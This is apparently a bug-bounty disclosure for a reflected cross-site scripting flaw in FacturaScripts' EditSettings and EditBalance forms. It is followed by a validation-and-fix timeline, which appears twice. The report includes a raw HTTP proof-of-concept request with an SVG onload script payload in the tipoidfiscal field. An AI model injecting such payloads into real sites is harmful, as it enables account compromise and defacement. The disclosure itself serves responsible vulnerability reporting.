facturascripts

Valid

Reported on

Jun 4th 2022

Description

There are two fields that can insert the XSS payload by the error log.

http://127.0.0.1/facturascripts/EditBalance, the codbalance field
http://127.0.0.1/facturascripts/EditSettings, the tipoidfiscal field in Fiscal Id

Both fields require 1 and 25 numbers or letters, no spaces, accents or any other character.. So we can not store the payload, but we can trigger a reflected XSS via the error log.

Proof of Concept

POST /facturascripts/EditSettings HTTP/1.1
Host: 127.0.0.1
...
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="action"

edit
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="activetab"

EditIdentificadorFiscal
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="code"

CI
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="multireqtoken"

61893af8ff1671201dcbeaff4d052cf544c4de1e|MvOEut
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="tipoidfiscal"

CI<svg/onload='alert(/xss/);'>
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="codeid"


------WebKitFormBoundaryYIfWjQXpEB2jLexN--

Impact

This vulnerability has the potential to deface websites, result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. a year ago

i0hex modified the report

a year ago

i0hex modified the report

a year ago

We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back a year ago

i0hex modified the report

a year ago

Carlos Garcia validated this vulnerability a year ago

i0hex has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Carlos Garcia marked this as fixed in 2022.1 with commit 7b4ddb a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

i0hex

commented a year ago

Researcher

@admin Can you assign CVE?

Jamie Slome

commented a year ago

Admin

Sorted 👍

to join this conversation

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. a year ago

i0hex modified the report

a year ago

i0hex modified the report

a year ago

We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back a year ago

i0hex modified the report

a year ago

Carlos Garcia validated this vulnerability a year ago

i0hex has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Carlos Garcia marked this as fixed in 2022.1 with commit 7b4ddb a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

i0hex

commented a year ago

Researcher

@admin Can you assign CVE?

Jamie Slome

commented a year ago

Admin

Sorted 👍

to join this conversation